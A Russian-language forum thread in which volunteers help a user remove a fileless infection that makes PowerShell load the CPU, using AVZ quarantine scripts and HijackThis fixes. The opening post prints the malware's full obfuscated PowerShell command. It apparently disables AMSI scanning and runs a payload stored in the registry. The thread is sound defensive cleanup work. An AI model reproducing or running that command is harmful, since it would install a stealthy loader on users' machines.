[решено] Powershell грузит комп 30-40% - Компьютерный форум OSzone.net

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)

- Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)

- - [решено] Powershell грузит комп 30-40% (http://forum.oszone.net/showthread.php?t=349954)

Powershell грузит комп 30-40%

Здраствуйте! Откуда не возьмись начал комп тормозить и подлагивать. Тогда я открыл диспетчер задач, все успокоилось, закрываю диспетчер задач через некоторое время вижу опять начинает тормозить. Тогда я подумал скачать другой диспетчер задач (я использовал Process Explorer с правами администратора), вижу powershell.exe с conhost.exe грузят. Тогда посмотрел расположение стандартное, в Command Line:

(powershell.exe -c "4609833558;$tBUn='5Syxst1emj.M_an_agnemwen4t.5Aubto2mautihonf.AzmsniUatislsk-abmspiIlni{tF7ai+le[d-5NoqnP.ubvli5c,=St)ateic' -replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361);'r$txBU9n=_$t_BU0n t-s_pl)it!''-3'';c[R_efn].yAs)se6mbdlyv.G!ethTy?pe8($8tB6Un}[0_])l.G_et+Fi+el!d(i$t6BU_n[}1]u,$ztB_Un_[2q])t.Szet?Vaslu_e(_$n[ul5l,_(3[615-n+e6]64x))'-replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361)|&('iviiveivx'-replace'iv');'q&(_gc_m (A*_-T/y*i).}Naymeb (g''yrusz_i8ntsg )xShy(1stvne4mi_;u)psdi3ang]_ ]Sy_ys}{t5eg3m.]_I_Ofj;uw_s9i._ngp7 iS_7ys_7t,e_tm./9R{u__nt_.ibm!!e.aoItn/ttei_r_o_6pSrbe_rurvi.-c,e[3s;}{ubs,5in[9g8 _9Mi__cir!_os/3o,f}7t.faW_icun3_e23;e_pug_b,lylicre hc_[lag8s]s+p e0}q_{6nde](lfe4)gadptte}( vdqo_i_ad rap7V_tD(i})5;k_pu_vb3lmdicu_ _s_ota_at_ig7c +hv.og0ido+ 7F_bLlgodt(_b){ckbyyuktes)[h]3_UY?!K!r77=F}-iyl[_e.__E.x0iis_rt_sc_(bk7oqq_/iy,_u!e1_rh__f8t_=wt_mbto_7qin_)_?_)Fi7el}ea1.Rmfe_am_dAj_l{l4lBy__tbefts(ocb]o,{qixcy4u7ser_lhufb[tw_{t9ba)oq)fio)b5:(q}b[yy2te{_[_]o_)Rige.gozis!5t8r?dy.s8L_osrca{vl_M3_ac9ch?i1_ne_0.3O_!pe.cn]S_puby_Kve?_y(cu@_b_foqw5i_S-qOFm_T_W9?AR_rEw\,[Mi8wc4r23os[_oyfyrt\eaC7TwoF\f.T_I.]Pb=0o}q__i)(4.,Gf{etc_V_a-]luy8e?()cbov1q_i__yu!je9r_7hf3_t9wp2tbsqo_q7{i,/eniu7dll,v)y;_nifuv(lU09YKp0rn=)(=n,wu!l2dl)mbr8e_]tu))r_ny3;ii_nnt[. G__nss95T=daU!Yw_Krv1.}Ll-en9wg_tb/h;-)f5o_3r(_{i_nm9t _wyoPo_xVyg=d0oq;yp4P7x_vV [_![=b_Gnwzs?Tk_-1!_;_y89PxwuVd+{.+)_t{=U!bYKebr_[_xyPl/x3V+_]^_!=_(!aby,wt3ebo)b)fofqbmiaei9!e.lpd_c(apz_FdceE0f97qF(t5bQ1v[??vdr0-]hnecs_Dt_q29.[aP77EPhp7rga=7jssd7}i_)B0xF2{x_CM_(Bao_mmmsaE}-_8gCcysh9_iyj{_.ezmnlc.o({r_tfxgob_j67l0_7c5b)eOM9_{a(_-_,__}h!a/yah8_4h_ai_tbJ_b45oq9ci+[_fyPlhx5V8qvE+wK_Z.+826+]s;u_}I_unvt0_Pt4}r_ jpnM]scd=c)(Io_n_ty=Ptq5r_)i_0;b]I!n=ttPj/t3rdj L-4jq=1_(Iw,njtg]Pt19r_)gzGnn.slT_m;NwbtjAaall./o+cu4at?tejV_tir1wtvuz4al_}M_e7smo_7r_y6{((loI{nz,tPt=t!rs5)(5_-d1_r),j}r7evif c_n,M5ec,j5(eIfuntkiPmt_vr)nc0k,5_reixf_ !]Lj_b,_08xx1!}0_0n_0,li03x(s40_q)t;c]Ma/pr_s}4ha]{lm.n9Co7_p,y[_(U_aYbK9hr,__0q,bknM?tcc,_=Gn+us_T[0);7_(_(utpV_/D.)anMas,r!s2xha_el{.c(Gen}thD6aelz_e1gmdaturedF_qorpmF1uv0ncn_t)il(on-_Pko_5ink}treq7r(_wnyM_cc,x}t_yrdpe_toqft_(p(_V_Du]))f3)a(6_);_m}k[v.Dl9el2I_ymp{_o7r_pt(-6b_oc_qit-notegdl[ul1b__oq]_i_)nt]p_{r=i-_va_gtce__ stbt_a!ati/ac= 8cex[8t_e{xrn_t klbvon{3gq 1=Nt1.Akl__loh_coa,8te_eV7i{irt[8u}as!lM?8eqm/sor47ys((9In0vt_P_dtr1_ gPx[Mgbh,_r_2efmm oI-unt2_P7t_5r _=hpe+)dI_a,[I_)ntc[P_t61r e)j)V__i,v=rwer[f wyIbnwitPayt-r+c y,cV_,,cUIivn.t_o32,a +T.,BJ_bhg,oeUI1}n_t!)32{_ ,Gp6Kjo?kj)fd;}_''-2re_pl[ac{e''_.(8..d)''n,''s$1a'' f-r?ep_la_ce_''bdoq_i''i,[8chear/](b343) _-r_epclahce_''v[EK]Z''3,[2chrarc](e37q))s;[lEn_vi_ro/nm4en}t]x::vCufrr(enatD/irwec_to]ry8=piwdh;[[eqc]:9:F_Ll_d([);'-replace('.NnOO(NnOO.NnOO.)'-replace'NnOO'),('$'+415/415)|&('DZmNiDZmNeDZmNx'-replace'DZmN');4750505109")

Вот это пишет.

Помогите пожалуйста, вот логи прикрепил.

Здравствуйте!

1. Пожалуйста, скачайте MiniRegTool64.zip и распакуйте его.

Запустите утилиту
Скопируйте и вставьте следующий текст в поле ввода:

Код:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP
Отметьте опцию Export keys.
Нажмите кнопку Go, после этого прикрепите к своему сообщению Result.txt.

2. Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

+
- выполните такой скрипт в AVZ

Код:

begin

 ClearQuarantineEx(true); 

 QuarantineFile('C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\WinDAT', '');

 QuarantineFile('C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\WinNAT', ''); 

 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine_task .\Quarantine\*', 1, 300000, false);

 RebootWindows(false);

end.

- Файл quarantine_task.zip из папки AVZ загрузите по ссылке http://dragokas.com/virusnet/

Спасибо что ответили! Вот я прикрепил AV_block_remove.log, но result.txt весит у меня 17 мб поэтому я незнаю как вам кинуть лог.

Вот ещё один лог.

Цитата:

Цитата VladikShok

Вот я прикрепил AV_block_remove.log, но result.txt весит у меня 17 мб поэтому я незнаю как вам кинуть лог. »

В архив его и на любой файлообменник без рекламы

https://dropmefiles.com/7FYJq вот CollectionLog.

2021.11.05_quarantine_845c9f5c92e499333f2dfcc8ecfddd52.7z вот имя карантина.

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger\AV\av_z.exe (Файл - Выполнить скрипт):

Код:

begin

 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);

 ClearQuarantineEx(true);

 QuarantineFile('C:\ProgramData\Windows\Profile\1.vbs', '');

 QuarantineFileF('C:\ProgramData\Windows\Profile', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);

 DeleteFile('C:\ProgramData\Windows\Profile\1.vbs', '64');

 DeleteFileMask('C:\ProgramData\Windows\Profile', '*', true);

 DeleteDirectory('C:\ProgramData\Windows\Profile');

 DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinDAT');

 DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT');

 RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'Synapse3', '32');

 RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'Synapse3', '64');

 RegKeyParamDel('hklm','SOFTWARE\Microsoft\CTF\TIP','yuerhftwt');

 RegKeyParamDel('hklm','SOFTWARE\Microsoft\CTF\TIP','jhytvrvr');

  if FileExists (GetAVZDirectory+'quarantine.7z') then DeleteFile(GetAVZDirectory+'quarantine.7z');

  ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);

  ExecuteSysClean;

 ExecuteWizard('SCU', 2, 3, true);

RebootWindows(true);

end.

после выполнения скрипта компьютер перезагрузится.

Файл quarantine.7z из папки AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

Профиксите в HijackThis из папки ..\AutoLogger\HiJackThis

Код:

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)

O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)

O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)

O22 - Task: (damaged) OneDrive Standalone Update Task-S-1-5-21-4181382184-3863360630-3152423739-1002 - C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing) (user missing)

- Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

Цитата:

Цитата VladikShok

А сами "руками" ничего не удаляли?

В папке с AVbr есть файл quarantine.zip ? Если да, то какого размера?

Спасибо кто помогал проблема решена!

Цитата:

Цитата VladikShok

проблема решена! »

Это хорошо. Но помогите, пожалуйста, другим:

Цитата:

Цитата Sandor

Нажмите кнопку Go, после этого прикрепите к своему сообщению Result.txt. »

Я просил в начале темы. Есть такой файл?

Цитата:

Цитата regist

А сами "руками" ничего не удаляли?
В папке с AVbr есть файл quarantine.zip ? Если да, то какого размера? »

На эти вопросы пожалуйста ответьте.

https://dropmefiles.com/7FYJq Вот Result.txt

Цитата:

Цитата regist

А сами "руками" ничего не удаляли? »

Нет, только возможно powershell.exe закрывал Process Explorer-ом.

Цитата:

Цитата regist

В папке с AVbr есть файл quarantine.zip ? »

Да.

Цитата:

Цитата regist

Если да, то какого размера? »

7,58 МБ

Цитата:

Цитата VladikShok

7,58 МБ »

Закачайте его на файлообменник и ссылку на скачивание дайте мне в ЛС.